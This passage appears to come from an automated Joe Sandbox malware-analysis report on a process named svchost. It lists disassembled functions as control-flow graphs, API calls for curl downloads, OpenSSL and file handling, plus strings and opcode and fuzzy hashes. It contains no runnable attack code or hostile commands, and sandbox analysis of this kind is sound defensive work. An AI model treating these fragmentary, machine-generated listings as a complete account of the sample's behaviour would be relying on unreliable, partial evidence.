262 7ffbab42e0f9-7ffbab42e103 260->262 261->202 263 7ffbab42e0eb-7ffbab42e0f2 261->263 264 7ffbab42e13c-7ffbab42e14e 262->264 265 7ffbab42e105-7ffbab42e128 CRYPTO_memdup 262->265 263->262 267 7ffbab42e150-7ffbab42e153 264->267 268 7ffbab42e155-7ffbab42e158 264->268 265->202 266 7ffbab42e12e-7ffbab42e135 265->266 266->264 270 7ffbab42e16b-7ffbab42e16e 267->270 268->202 269 7ffbab42e15e-7ffbab42e165 268->269 269->202 269->270 271 7ffbab42e170-7ffbab42e180 call 7ffbab481e60 270->271 272 7ffbab42e1e9-7ffbab42e20c 270->272 275 7ffbab42e182-7ffbab42e1b0 ERR_new ERR_set_debug ERR_set_error 271->275 276 7ffbab42e1b5-7ffbab42e1b9 271->276 272->206 275->202 277 7ffbab42e1bb-7ffbab42e1be 276->277 278 7ffbab42e1c9-7ffbab42e1e3 276->278 277->278 279 7ffbab42e1c0-7ffbab42e1c3 277->279 278->202 278->272 279->202 279->278
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_lock_freeO_free$D_lock_newO_free_ex_dataO_new_ex_dataO_zallocR_newR_set_debugR_set_error
                                                                                              • String ID: SSL_set_ct_validation_callback$ossl_ssl_connection_new_int$ssl\ssl_lib.c
                                                                                              • API String ID: 3044204582-3251968464
                                                                                              • Opcode ID: 78889371e09e9e759950568bd42c4b6e7c0cf0ede71c4b29a1cc3fa27e1db14d
                                                                                              • Instruction ID: a6fdd57f0e371abdb93943c47db7fa4f7bd8d32814e28f404dae0ab214e59ee3
                                                                                              • Opcode Fuzzy Hash: 78889371e09e9e759950568bd42c4b6e7c0cf0ede71c4b29a1cc3fa27e1db14d
                                                                                              • Instruction Fuzzy Hash: 0C1206B660AF8296EB9A9F35D5902AC73A4FB48B44F488139DF6C47365DF38E464C310
                                                                                              Function 00007FFBAAFE72F0 Relevance: 47.7, APIs: 17, Strings: 10, Instructions: 474COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 281 7ffbaafe72f0-7ffbaafe7337 282 7ffbaafe7339 281->282 283 7ffbaafe733c-7ffbaafe73d9 curl_easy_setopt * 6 281->283 282->283 284 7ffbaafe73f3 283->284 285 7ffbaafe73db-7ffbaafe73e1 283->285 287 7ffbaafe73f6-7ffbaafe7425 curl_easy_setopt 284->287 286 7ffbaafe73e3-7ffbaafe73e6 285->286 285->287 286->284 288 7ffbaafe73e8-7ffbaafe73ef 286->288 289 7ffbaafe7427-7ffbaafe742d 287->289 290 7ffbaafe7440 287->290 288->286 292 7ffbaafe73f1 288->292 291 7ffbaafe7443-7ffbaafe7466 curl_easy_setopt curl_easy_perform 289->291 293 7ffbaafe742f 289->293 290->291 294 7ffbaafe7468-7ffbaafe7488 curl_easy_strerror 291->294 295 7ffbaafe74c3-7ffbaafe7502 curl_easy_getinfo * 2 291->295 292->287 296 7ffbaafe7430-7ffbaafe7433 293->296 298 7ffbaafe7490-7ffbaafe7497 294->298 299 7ffbaafe7658 295->299 300 7ffbaafe7508-7ffbaafe750f 295->300 296->290 297 7ffbaafe7435-7ffbaafe743c 296->297 297->296 301 7ffbaafe743e 297->301 298->298 302 7ffbaafe7499-7ffbaafe74be call 7ffbaafc3ff0 298->302 303 7ffbaafe765d 299->303 300->299 304 7ffbaafe7515-7ffbaafe7528 300->304 301->291 314 7ffbaafe79ea-7ffbaafe7a0f call 7ffbab03b0f0 302->314 306 7ffbaafe7660-7ffbaafe7665 303->306 307 7ffbaafe7530-7ffbaafe7537 304->307 309 7ffbaafe7667-7ffbaafe766f 306->309 310 7ffbaafe76a2-7ffbaafe76a5 306->310 307->307 311 7ffbaafe7539-7ffbaafe756a call 7ffbaafc3ff0 307->311 309->310 315 7ffbaafe7671-7ffbaafe767f 309->315 312 7ffbaafe795b-7ffbaafe79e7 call 7ffbaafd8370 310->312 313 7ffbaafe76ab-7ffbaafe76d7 curl_easy_setopt call 7ffbab06b050 310->313 323 7ffbaafe75d3-7ffbaafe75e8 311->323 324 7ffbaafe756c-7ffbaafe7577 311->324 312->314 331 7ffbaafe76d9 313->331 332 7ffbaafe76dc-7ffbaafe7713 call 7ffbaafe4a30 313->332 320 7ffbaafe769a-7ffbaafe769d call 7ffbab03b110 315->320 321 7ffbaafe7681-7ffbaafe7694 315->321 320->310 321->320 328 7ffbaafe7a60-7ffbaafe7a65 call 7ffbab049cd4 321->328 323->303 334 7ffbaafe75ea-7ffbaafe7609 call 7ffbab06b3f0 323->334 330 7ffbaafe757a-7ffbaafe7587 call 7ffbab06b3f0 324->330 330->323 342 7ffbaafe7589-7ffbaafe75aa 330->342 331->332 343 7ffbaafe7719-7ffbaafe77a8 call 7ffbaafc3ff0 call 7ffbaafe40d0 call 7ffbab038d14 332->343 344 7ffbaafe77ad-7ffbaafe77ce curl_easy_setopt curl_easy_perform call 7ffbaafe4930 332->344 334->303 345 7ffbaafe760b 334->345 346 7ffbaafe75b8-7ffbaafe75c5 342->346 347 7ffbaafe75ac-7ffbaafe75b0 342->347 343->314 351 7ffbaafe77d3-7ffbaafe77d6 344->351 349 7ffbaafe7610-7ffbaafe7627 call 7ffbab06a8b0 345->349 346->330 347->346 352 7ffbaafe75b2-7ffbaafe75b6 347->352 360 7ffbaafe7629-7ffbaafe7647 call 7ffbab06b3f0 349->360 361 7ffbaafe764b-7ffbaafe7651 349->361 356 7ffbaafe77d8-7ffbaafe7803 351->356 357 7ffbaafe7809-7ffbaafe780b 351->357 352->346 358 7ffbaafe75c7-7ffbaafe75cd 352->358 356->357 362 7ffbaafe7a10-7ffbaafe7a12 356->362 363 7ffbaafe78ca-7ffbaafe7956 call 7ffbaafc3ff0 call 7ffbaafe40d0 call 7ffbab038d14 357->363 364 7ffbaafe7811-7ffbaafe782a curl_easy_strerror 357->364 358->323 365 7ffbaafe7653-7ffbaafe7656 358->365 360->349 378 7ffbaafe7649 360->378 361->303 361->365 369 7ffbaafe7a14-7ffbaafe7a1b 362->369 370 7ffbaafe7a1d-7ffbaafe7a2d 362->370 363->314 368 7ffbaafe7830-7ffbaafe7837 364->368 365->306 368->368 374 7ffbaafe7839-7ffbaafe78c5 call 7ffbaafc3ff0 call 7ffbaafe40d0 call 7ffbab038d14 368->374 375 7ffbaafe7a31-7ffbaafe7a5f call 7ffbaafc1ba0 call 7ffbaafc2570 call 7ffbab03d5f0 369->375 370->375 374->314 375->328 378->303
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: curl_easy_setopt$curl_easy_getinfocurl_easy_performcurl_easy_strerror$_invalid_parameter_noinfo_noreturn
                                                                                              • String ID: "$File could not be created.$Response code: {} Content Type: {}$applicat$ion/octe$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$t-stream$text/plain; charset=utf-8
                                                                                              • API String ID: 4244892839-2565517602
                                                                                              • Opcode ID: 6634676893988e330a59b13b0f530b0e5d7fbb88ca349729e62b41c240678f05
                                                                                              • Instruction ID: 8f3b0ec62f5ce47fa572d5a7227f57a16e845646344ff12033d16106b1d22f68
                                                                                              • Opcode Fuzzy Hash: 6634676893988e330a59b13b0f530b0e5d7fbb88ca349729e62b41c240678f05
                                                                                              • Instruction Fuzzy Hash: 0422B1A2B09B81C6EB26CB35D4402BD77A0FB84B88F408636CE5D57B65DF39E585C350
                                                                                              Function 00007FFBAAFE65F0 Relevance: 32.0, APIs: 15, Strings: 3, Instructions: 517COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 395 7ffbaafe65f0-7ffbaafe6648 curl_easy_init 396 7ffbaafe664a-7ffbaafe6670 call 7ffbaafc3ff0 395->396 397 7ffbaafe6675-7ffbaafe667d 395->397 407 7ffbaafe684c-7ffbaafe6880 call 7ffbab03b0f0 396->407 399 7ffbaafe667f 397->399 400 7ffbaafe6682-7ffbaafe6687 397->400 399->400 401 7ffbaafe6689-7ffbaafe668c 400->401 402 7ffbaafe668e-7ffbaafe6696 400->402 404 7ffbaafe66b2-7ffbaafe671c call 7ffbab03b118 call 7ffbaafe8e40 401->404 405 7ffbaafe6698-7ffbaafe66a3 402->405 406 7ffbaafe66ac-7ffbaafe66ae 402->406 415 7ffbaafe6720-7ffbaafe673c call 7ffbaafee1c0 404->415 405->406 408 7ffbaafe66a5-7ffbaafe66a9 405->408 406->404 408->406 418 7ffbaafe673e-7ffbaafe6767 call 7ffbaafe72f0 call 7ffbaafe6e60 415->418 423 7ffbaafe6db7-7ffbaafe6ddb curl_easy_cleanup call 7ffbaafc56a0 418->423 424 7ffbaafe676d-7ffbaafe67ab call 7ffbaafe5fe0 418->424 423->407 431 7ffbaafe6de1-7ffbaafe6df2 423->431 429 7ffbaafe67c2 424->429 430 7ffbaafe67ad-7ffbaafe67b6 424->430 433 7ffbaafe67c6-7ffbaafe67e7 call 7ffbaafedcf0 curl_easy_cleanup curl_easy_init 429->433 430->429 432 7ffbaafe67b8-7ffbaafe67c0 430->432 434 7ffbaafe6df8-7ffbaafe6e0b 431->434 435 7ffbaafe6847 call 7ffbab03b110 431->435 432->433 443 7ffbaafe6881-7ffbaafe68ec call 7ffbab03b118 call 7ffbaafe8e40 433->443 444 7ffbaafe67ed-7ffbaafe6819 call 7ffbaafc3ff0 433->444 438 7ffbaafe6e1e-7ffbaafe6e23 call 7ffbab049cd4 434->438 439 7ffbaafe6e0d 434->439 435->407 446 7ffbaafe6e24-7ffbaafe6e29 call 7ffbab049cd4 438->446 439->435 457 7ffbaafe68f0-7ffbaafe690d call 7ffbaafee1c0 443->457 444->407 453 7ffbaafe681b-7ffbaafe682c 444->453 455 7ffbaafe6e2a-7ffbaafe6e2f call 7ffbab049cd4 446->455 453->435 456 7ffbaafe682e-7ffbaafe6841 453->456 462 7ffbaafe6e30-7ffbaafe6e35 call 7ffbab049cd4 455->462 456->435 456->438 463 7ffbaafe690f-7ffbaafe6951 call 7ffbaafe72f0 call 7ffbaafce610 457->463 467 7ffbaafe6e36-7ffbaafe6e3b call 7ffbab049cd4 462->467 473 7ffbaafe6987-7ffbaafe69ac call 7ffbaafe6e60 463->473 474 7ffbaafe6953-7ffbaafe6967 463->474 475 7ffbaafe6e3c-7ffbaafe6e41 call 7ffbab049cd4 467->475 473->423 484 7ffbaafe69b2-7ffbaafe69b5 473->484 476 7ffbaafe6969-7ffbaafe697c 474->476 477 7ffbaafe6982 call 7ffbab03b110 474->477 483 7ffbaafe6e42-7ffbaafe6e47 call 7ffbab049cd4 475->483 476->446 476->477 477->473 484->423 486 7ffbaafe69bb-7ffbaafe69e0 call 7ffbaafe5fe0 484->486 490 7ffbaafe69e2-7ffbaafe69e9 486->490 491 7ffbaafe69fe-7ffbaafe6a08 486->491 490->491 493 7ffbaafe69eb-7ffbaafe69fc 490->493 492 7ffbaafe6a0c-7ffbaafe6a33 call 7ffbaafedcf0 call 7ffbaafe8040 491->492 498 7ffbaafe6d77-7ffbaafe6d7f 492->498 499 7ffbaafe6a39-7ffbaafe6a64 call 7ffbaafe8390 492->499 493->492 500 7ffbaafe6d81-7ffbaafe6d92 498->500 501 7ffbaafe6dae-7ffbaafe6db3 498->501 508 7ffbaafe6a6a-7ffbaafe6a8f call 7ffbaafe7d50 499->508 509 7ffbaafe6d35-7ffbaafe6d40 499->509 503 7ffbaafe6da9 call 7ffbab03b110 500->503 504 7ffbaafe6d94-7ffbaafe6da7 500->504 501->423 503->501 504->503 506 7ffbaafe6e12-7ffbaafe6e17 call 7ffbab049cd4 504->506 518 7ffbaafe6e18-7ffbaafe6e1d call 7ffbab049cd4 506->518 519 7ffbaafe6a95-7ffbaafe6aad curl_easy_cleanup curl_easy_init 508->519 520 7ffbaafe6cf1-7ffbaafe6cf9 508->520 509->498 511 7ffbaafe6d42-7ffbaafe6d56 509->511 515 7ffbaafe6d58-7ffbaafe6d6b 511->515 516 7ffbaafe6d71-7ffbaafe6d76 call 7ffbab03b110 511->516 515->483 515->516 516->498 518->438 525 7ffbaafe6be4-7ffbaafe6c47 call 7ffbab03b118 call 7ffbaafe8e40 519->525 526 7ffbaafe6ab3-7ffbaafe6adf call 7ffbaafc3ff0 519->526 523 7ffbaafe6d2c-7ffbaafe6d31 520->523 524 7ffbaafe6cfb-7ffbaafe6d0c 520->524 523->509 529 7ffbaafe6d27 call 7ffbab03b110 524->529 530 7ffbaafe6d0e-7ffbaafe6d21 524->530 546 7ffbaafe6c50-7ffbaafe6c6d call 7ffbaafee1c0 525->546 536 7ffbaafe6b12-7ffbaafe6b26 526->536 537 7ffbaafe6ae1-7ffbaafe6af2 526->537 529->523 530->475 530->529 540 7ffbaafe6b28-7ffbaafe6b3c 536->540 541 7ffbaafe6b5d-7ffbaafe6b65 536->541 538 7ffbaafe6af4-7ffbaafe6b07 537->538 539 7ffbaafe6b0d call 7ffbab03b110 537->539 538->475 538->539 539->536 544 7ffbaafe6b57-7ffbaafe6b5c call 7ffbab03b110 540->544 545 7ffbaafe6b3e-7ffbaafe6b51 540->545 547 7ffbaafe6b98-7ffbaafe6ba9 541->547 548 7ffbaafe6b67-7ffbaafe6b78 541->548 544->541 545->455 545->544 559 7ffbaafe6c6f-7ffbaafe6c87 call 7ffbaafe72f0 546->559 547->407 553 7ffbaafe6baf-7ffbaafe6bc0 547->553 551 7ffbaafe6b7a-7ffbaafe6b8d 548->551 552 7ffbaafe6b93 call 7ffbab03b110 548->552 551->462 551->552 552->547 553->435 554 7ffbaafe6bc6-7ffbaafe6bd9 553->554 554->518 558 7ffbaafe6bdf 554->558 558->435 561 7ffbaafe6c8c-7ffbaafe6ca8 call 7ffbaafce610 559->561 564 7ffbaafe6caa-7ffbaafe6cbc 561->564 565 7ffbaafe6cdc-7ffbaafe6cf0 call 7ffbaafe6e60 561->565 566 7ffbaafe6cd7 call 7ffbab03b110 564->566 567 7ffbaafe6cbe-7ffbaafe6cd1 564->567 565->520 566->565 567->467 567->566
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: curl_easy_init$curl_easy_cleanup
                                                                                              • String ID: CURL could not be initialized download_file$CURL could not be re-initialized download_file$CURL could not be re-initialized_2 download_file
                                                                                              • API String ID: 2458899574-242915743
                                                                                              • Opcode ID: edfc6142fef203dc8b3074d865694ce6d24d2c0a164ed5749f09d8e61e569a32
                                                                                              • Instruction ID: fbf4eff33c085cd0acf04cf792f8cb8aa0879f68d139c0e121266405aab5d97c
                                                                                              • Opcode Fuzzy Hash: edfc6142fef203dc8b3074d865694ce6d24d2c0a164ed5749f09d8e61e569a32
                                                                                              • Instruction Fuzzy Hash: 612222B2E1A78585EB658B34D8403BD6765EB857A8F108331EEAD46BD9EF3DD081C340
                                                                                              Function 00007FFBAAFE6E60 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 607 7ffbaafe6e60-7ffbaafe6e76 608 7ffbaafe6e78-7ffbaafe6e8a 607->608 609 7ffbaafe6eb5-7ffbaafe6ec6 607->609 612 7ffbaafe6ea4-7ffbaafe6eb1 call 7ffbab03b110 608->612 613 7ffbaafe6e8c-7ffbaafe6e9f 608->613 610 7ffbaafe6ec8 609->610 611 7ffbaafe6ee5-7ffbaafe6ef7 609->611 617 7ffbaafe6ed0-7ffbaafe6ee3 call 7ffbab03b110 610->617 615 7ffbaafe6efd-7ffbaafe6f56 call 7ffbab049cd4 curl_easy_init 611->615 612->609 614 7ffbaafe6ea1 613->614 613->615 614->612 624 7ffbaafe6f58-7ffbaafe6f7f call 7ffbaafc3ff0 615->624 625 7ffbaafe6f84-7ffbaafe6f8c 615->625 617->611 632 7ffbaafe7159-7ffbaafe7183 call 7ffbab03b0f0 624->632 627 7ffbaafe6f91-7ffbaafe6f96 625->627 628 7ffbaafe6f8e 625->628 630 7ffbaafe6f98-7ffbaafe6f9a 627->630 631 7ffbaafe6f9c-7ffbaafe6fa4 627->631 628->627 633 7ffbaafe6fbf-7ffbaafe702d call 7ffbab03b118 call 7ffbaafe8e40 630->633 634 7ffbaafe6fba-7ffbaafe6fbc 631->634 635 7ffbaafe6fa6-7ffbaafe6fb1 631->635 643 7ffbaafe7032-7ffbaafe7050 call 7ffbaafee1c0 633->643 634->633 635->634 637 7ffbaafe6fb3-7ffbaafe6fb7 635->637 637->634 646 7ffbaafe7052-7ffbaafe7075 call 7ffbaafe7a70 call 7ffbaafe6e60 643->646 651 7ffbaafe727a-7ffbaafe729e curl_easy_cleanup call 7ffbaafc56a0 646->651 652 7ffbaafe707b-7ffbaafe709c call 7ffbaafe5fe0 646->652 651->632 657 7ffbaafe72a4-7ffbaafe72b5 651->657 658 7ffbaafe70c3-7ffbaafe70cd 652->658 659 7ffbaafe709e-7ffbaafe70ad 652->659 660 7ffbaafe7154 call 7ffbab03b110 657->660 661 7ffbaafe72bb-7ffbaafe72ce 657->661 663 7ffbaafe70d2-7ffbaafe70f4 call 7ffbaafedcf0 curl_easy_cleanup curl_easy_init 658->663 659->658 662 7ffbaafe70af-7ffbaafe70c1 659->662 660->632 664 7ffbaafe72d0 661->664 665 7ffbaafe72db-7ffbaafe72e0 call 7ffbab049cd4 661->665 662->663 670 7ffbaafe70fa-7ffbaafe7126 call 7ffbaafc3ff0 663->670 671 7ffbaafe7184-7ffbaafe71df call 7ffbab03b118 call 7ffbaafe8e40 663->671 664->660 670->632 677 7ffbaafe7128-7ffbaafe7139 670->677 681 7ffbaafe71e4-7ffbaafe7201 call 7ffbaafee1c0 671->681 677->660 679 7ffbaafe713b-7ffbaafe714e 677->679 679->660 679->665 684 7ffbaafe7203-7ffbaafe7211 call 7ffbaafe7a70 681->684 686 7ffbaafe7216-7ffbaafe7231 call 7ffbaafce610 684->686 689 7ffbaafe7233-7ffbaafe7244 686->689 690 7ffbaafe7260-7ffbaafe7275 call 7ffbaafe6e60 686->690 691 7ffbaafe7246-7ffbaafe7259 689->691 692 7ffbaafe725b call 7ffbab03b110 689->692 690->651 691->692 694 7ffbaafe72d5-7ffbaafe72da call 7ffbab049cd4 691->694 692->690 694->665
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$curl_easy_cleanupcurl_easy_init
                                                                                              • String ID: CURL could not be initialized download_json$CURL could not be re-initialized download_json
                                                                                              • API String ID: 2934429083-2962405094
                                                                                              • Opcode ID: 590d92523ebcee6e3a7bbbfe03d2579010e41bb78fb3ece1522039a46dbd390c
                                                                                              • Instruction ID: a3d016fd28aee627f38e3d636874de92ef31947cf576e6f36a7eec959d334600
                                                                                              • Opcode Fuzzy Hash: 590d92523ebcee6e3a7bbbfe03d2579010e41bb78fb3ece1522039a46dbd390c
                                                                                              • Instruction Fuzzy Hash: 70C1D1B2A0A78185EB258B75D4403AD67A4FB84798F508235EEAC43BA5EF3DD591C300
                                                                                              Function 00007FFBAB422F50 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 73COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000000,00007FFBAB433D8B,00000000,00007FFBAB41ABE9,?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB422F7F
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(00000000,00007FFBAB433D8B,00000000,00007FFBAB41ABE9,?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB422F97
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(00000000,00007FFBAB433D8B,00000000,00007FFBAB41ABE9,?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB422FA8
                                                                                              • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFBAB433D8B,00000000,00007FFBAB41ABE9,?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB422FE7
                                                                                              • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFBAB433D8B,00000000,00007FFBAB41ABE9,?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB423012
                                                                                              • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFBAB433D8B,00000000,00007FFBAB41ABE9,?,?,?,?,?,00007FFBAB41AB6E), ref: 00007FFBAB42303B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_run_once$R_newR_set_debugR_set_error
                                                                                              • String ID: OPENSSL_init_ssl$ssl\ssl_init.c
                                                                                              • API String ID: 3879570137-538246785
                                                                                              • Opcode ID: e3496e332020ca9c6fe1bb8cde3ecf2beeb22889fd1d9285841be6b611d3b505
                                                                                              • Instruction ID: 032c274a9e08a97b3be5d8040abe7bf14f3045d47c9d42eafb42ae478ca92204
                                                                                              • Opcode Fuzzy Hash: e3496e332020ca9c6fe1bb8cde3ecf2beeb22889fd1d9285841be6b611d3b505
                                                                                              • Instruction Fuzzy Hash: DF313EE1B1A20386FB969735E8917B933A1EF94380F889035ED2E472B5DE2CE945D640
                                                                                              Function 00007FFBAB067FFC Relevance: 13.8, APIs: 9, Instructions: 282fileCOMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 888 7ffbab067ffc-7ffbab06806d call 7ffbab067d24 891 7ffbab06806f-7ffbab068078 call 7ffbab049864 888->891 892 7ffbab068087-7ffbab068091 call 7ffbab066934 888->892 897 7ffbab06807b-7ffbab068082 call 7ffbab049888 891->897 898 7ffbab0680ac-7ffbab068124 CreateFileW 892->898 899 7ffbab068093-7ffbab0680aa call 7ffbab049864 call 7ffbab049888 892->899 910 7ffbab0683ee-7ffbab06840e 897->910 902 7ffbab0681b2 898->902 903 7ffbab06812a-7ffbab06813d 898->903 899->897 905 7ffbab0681b5-7ffbab0681c0 GetFileType 902->905 907 7ffbab06817f-7ffbab0681ad GetLastError call 7ffbab049818 903->907 908 7ffbab06813f-7ffbab068143 903->908 911 7ffbab0681c2-7ffbab0681fd GetLastError call 7ffbab049818 CloseHandle 905->911 912 7ffbab068213-7ffbab06821a 905->912 907->897 908->907 914 7ffbab068145-7ffbab06817d CreateFileW 908->914 911->897 923 7ffbab068203-7ffbab06820e call 7ffbab049888 911->923 918 7ffbab068222-7ffbab068225 912->918 919 7ffbab06821c-7ffbab068220 912->919 914->905 914->907 921 7ffbab06822b-7ffbab068280 call 7ffbab06684c 918->921 922 7ffbab068227 918->922 919->921 927 7ffbab068282-7ffbab06828e call 7ffbab067f38 921->927 928 7ffbab06829f-7ffbab0682d2 call 7ffbab067aa4 921->928 922->921 923->897 927->928 934 7ffbab068290 927->934 935 7ffbab0682d8-7ffbab06831b 928->935 936 7ffbab0682d4-7ffbab0682d6 928->936 937 7ffbab068292-7ffbab06829a call 7ffbab05c56c 934->937 938 7ffbab06833d-7ffbab068348 935->938 939 7ffbab06831d-7ffbab068321 935->939 936->937 937->910 940 7ffbab06834e-7ffbab068352 938->940 941 7ffbab0683ec 938->941 939->938 943 7ffbab068323-7ffbab068338 939->943 940->941 944 7ffbab068358-7ffbab06839d CloseHandle CreateFileW 940->944 941->910 943->938 946 7ffbab0683d2-7ffbab0683e7 944->946 947 7ffbab06839f-7ffbab0683cd GetLastError call 7ffbab049818 call 7ffbab066a74 944->947 946->941 947->946
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                              • String ID:
                                                                                              • API String ID: 1617910340-0
                                                                                              • Opcode ID: 8437788e23e207c34b3612ebda8bd24e9ae57695d1c9820b1b9e8f409681dfe0
                                                                                              • Instruction ID: 3c3aac78025407057dd3bdf205f7edca087afe942e91c3a745b55b6a7f8949f0
                                                                                              • Opcode Fuzzy Hash: 8437788e23e207c34b3612ebda8bd24e9ae57695d1c9820b1b9e8f409681dfe0
                                                                                              • Instruction Fuzzy Hash: 25C1C373B25B4185EB21CF78C4902AD3B65FB49B98F11822ADE2E573A4DF78E461C340
                                                                                              Function 00007FFBAB056710 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(?,?,00000000,00007FFBAB056E8A,?,?,?,00007FFBAB056E0D), ref: 00007FFBAB05677D
                                                                                              • GetLastError.KERNEL32(?,?,00000000,00007FFBAB056E8A,?,?,?,00007FFBAB056E0D), ref: 00007FFBAB05678F
